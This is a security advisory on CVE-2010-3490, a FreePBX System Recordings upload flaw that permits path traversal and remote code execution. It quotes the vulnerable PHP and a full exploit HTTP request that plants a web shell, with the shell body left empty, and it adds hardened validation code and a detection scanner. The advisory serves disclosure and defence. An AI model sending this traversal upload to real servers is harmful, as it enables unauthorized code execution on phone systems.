Trustwave's SpiderLabs Security Advisory TWSL2010-005:

FreePBX recordings interface allows remote code execution

https://www.trustwave.com/spiderlabs/advisories/TWSL2010-005.txt

Published: 2010-09-23
Version: 1.0

Vendor: FreePBX (http://www.freepbx.org/)
Product: FreePBX and VOIP solutions (AsteriskNOW, TrixBox, etc.) using it
Version(s) affected: 2.8.0 and below

Product Description:
FreePBX is an easy to use GUI (graphical user interface) that controls and
manages Asterisk, the world's most popular open source telephony engine
software. FreePBX has been developed and hardened by thousands of
volunteers, has been downloaded over 5,000,000 times, and is utilized in an
estimated 500,000 active phone systems.

Source: http://www.freepbx.org
Credit: Wendel G. Henrique of Trustwave's SpiderLabs

CVE: CVE-2010-3490

Finding:
The configuration interface for FreePBX is prone to remote arbitrary code
execution through the System Recordings menu. FreePBX does not handle file
uploads in a secure manner, allowing an attacker to manipulate both the file
extension and the beginning of the uploaded file name.

The piece of code below, found in page.recordings.php, illustrates part of
the recordings upload feature.

/* Code removed to fit better on advisory */

<?php
if (isset($_FILES['ivrfile']['tmp_name']) &&
    is_uploaded_file($_FILES['ivrfile']['tmp_name'])) {
    if (empty($usersnum)) {
        $dest = "unnumbered-";
    } else {
        /* $usersnum comes from the request and is used without validation */
        $dest = "{$usersnum}-";
    }
    /* the suffix is whatever follows the last "." in the client-supplied name */
    $suffix = substr(strrchr($_FILES['ivrfile']['name'], "."), 1);
    /* unvalidated prefix and suffix are concatenated straight into the path */
    $destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
    move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
    echo "<h6>"._("Successfully uploaded")."
".$_FILES['ivrfile']['name']."</h6>";
    $rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
} ?>

/* Code removed to fit better on advisory */

When a file is uploaded, a copy is saved temporarily under the /tmp/
directory, where the name of the file is composed of
user-controlled-staticname.extension, where:

  "user-controlled" is the $usersnum variable.
  "staticname" is -ivrrecording.
  "extension" is controlled by the user.

If the $usersnum variable is not defined, then a static string (unnumbered)
is used.

Finally, when the user clicks on the save button on the System Recordings
interface, the file is saved with the original file name provided by the
user under the /var/lib/asterisk/sounds/custom/ directory.

When uploading a file, an attacker can manipulate the $usersnum variable to
perform a path traversal attack and save it anywhere the web server user
has access, for example the Apache DocumentRoot. This allows an attacker to
upload malicious code to the web server and execute it with the web
server's access permissions.

The HTTP request below illustrates the upload of a phpshell.

POST /admin/config.php HTTP/1.1
Host: 10.10.1.3
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://10.10.1.3/admin/config.php
Cookie: ARI=cookieValue; PHPSESSID=cookieValue
Authorization: Basic base64auth
Content-Type: multipart/form-data; boundary=---------------------------5991806838789183981588991120
Content-Length: 116089

-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="display"

recordings
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="action"

recordings_start
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="usersnum"

../../../../../var/www/html/admin/SpiderLabs
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
Content-Type: application/octet-stream

<?php
/* WebShell code goes here */
?>

-----------------------------5991806838789183981588991120--

To access the webshell in this example, an attacker would use
the following path: http://10.10.1.3/admin/SpiderLabs-ivrrecording.php

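The following PHP is an added example written for this page, not the maintainer's patch or FreePBX code, showing the three checks that close the hole described above: a numeric-only $usersnum, an audio-only extension whitelist, and a containment check on the final path. The function name, the whitelist and the directory used in the demo are assumptions.

```php
<?php
// Added example, not FreePBX code: a hardened replacement for the
// destination-path logic quoted in the advisory. Names are assumptions.
const ALLOWED_SUFFIXES = ['wav', 'gsm', 'ulaw', 'alaw', 'sln'];  // audio only

// Returns a safe destination path or throws on hostile input.
function safe_recording_destination(string $usersnum, string $originalName, string $savePath): string
{
    // 1. $usersnum was the traversal vector: allow only a numeric id.
    if ($usersnum === '') {
        $dest = 'unnumbered-';
    } elseif (preg_match('/^[0-9]{1,10}\z/', $usersnum)) {
        $dest = $usersnum . '-';
    } else {
        throw new InvalidArgumentException('usersnum must be numeric');
    }

    // 2. The original trusted the client-supplied extension, so ".php"
    //    was accepted. Take it after basename() and whitelist it.
    $suffix = strtolower(pathinfo(basename($originalName), PATHINFO_EXTENSION));
    if (!in_array($suffix, ALLOWED_SUFFIXES, true)) {
        throw new InvalidArgumentException("extension '$suffix' not allowed");
    }

    // 3. Defence in depth: confirm the final path stays under $savePath
    //    even if the checks above are ever loosened.
    $root = realpath($savePath);
    if ($root === false) {
        throw new RuntimeException('recordings directory does not exist');
    }
    $final = $root . DIRECTORY_SEPARATOR . $dest . 'ivrrecording.' . $suffix;
    if (strpos($final, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('destination escapes recordings directory');
    }
    return $final;
}
// Constructed inputs mirroring the advisory's request; run from the CLI.
$cases = [
    ['42', 'greeting.wav'],                                           // legitimate
    ['../../../../../var/www/html/admin/SpiderLabs', 'webshell.php'], // traversal
    ['7', 'shell.php'],                                               // bad suffix
];
foreach ($cases as [$num, $name]) {
    try {
        echo "OK   ", safe_recording_destination($num, $name, sys_get_temp_dir()), "\n";
    } catch (Exception $e) {
        echo "DENY ", $e->getMessage(), "\n";
    }
}
```

Only the first case yields a path; the traversal string fails the numeric check and the .php name fails the whitelist before anything touches the filesystem.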
Maintainer Response:
The maintainer has released a patch to address this issue for all versions
of the software 2.3 and newer.

Details of the patch can be found here:
http://www.freepbx.org/trac/ticket/4553

Remediation Steps:
Install the maintainer-provided patch.

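As an added example (not from the advisory or the project), a read-only PHP scan an administrator can run on a host that was exposed before patching, looking for the "<prefix>-ivrrecording.<ext>" artefacts this upload path leaves behind; the directory paths and the suffix list are assumptions for a typical install.

```php
<?php
// Added example, not part of the advisory: a read-only scan for files that
// the vulnerable upload path would leave behind. Directory paths are
// assumptions for a typical install; adjust to the local layout.
const WEB_ROOTS      = ['/var/www/html'];                          // no recordings belong here
const RECORDING_DIRS = ['/var/lib/asterisk/sounds/custom', '/tmp']; // recordings expected, audio only
const EXEC_SUFFIXES  = ['php', 'php3', 'php4', 'php5', 'phtml', 'phar'];

// Collects "<prefix>-ivrrecording.<ext>" files: every match under a web root,
// and only server-executable matches under the recordings directories.
function find_suspicious_recordings(array $webRoots, array $recordingDirs): array
{
    $hits = [];
    $scan = function (string $root, bool $anySuffix) use (&$hits): void {
        if (!is_dir($root)) {
            return;
        }
        $it = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
        );
        foreach ($it as $file) {
            if (!preg_match('/-ivrrecording\.([a-z0-9]+)$/i', $file->getFilename(), $m)) {
                continue;
            }
            if ($anySuffix || in_array(strtolower($m[1]), EXEC_SUFFIXES, true)) {
                $hits[] = $file->getPathname();
            }
        }
    };
    foreach ($webRoots as $d)      { $scan($d, true); }
    foreach ($recordingDirs as $d) { $scan($d, false); }
    return $hits;
}

foreach (find_suspicious_recordings(WEB_ROOTS, RECORDING_DIRS) as $path) {
    echo "suspicious upload artefact: $path\n";
}
```

Run it as a user with read access to the web root and sounds directories; any hit warrants a look at the file contents and the web server access log for the matching upload.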
Vendor Communication Timeline:
08/13/10 - Initial contact
08/18/10 - Vulnerability disclosed
09/16/10 - Initial fix proposed by maintainer
09/22/10 - Fix reviewed, improved, and released by maintainer
09/23/10 - Advisory public release

Revision History:
1.0 Initial publication

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations, ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers, manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs is the advanced security team at Trustwave responsible for
incident response and forensics, ethical hacking and application security
tests for Trustwave's clients. SpiderLabs has responded to hundreds of
security incidents, performed thousands of ethical hacking exercises and
tested the security of hundreds of business applications for Fortune 500
organizations. For more information visit
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.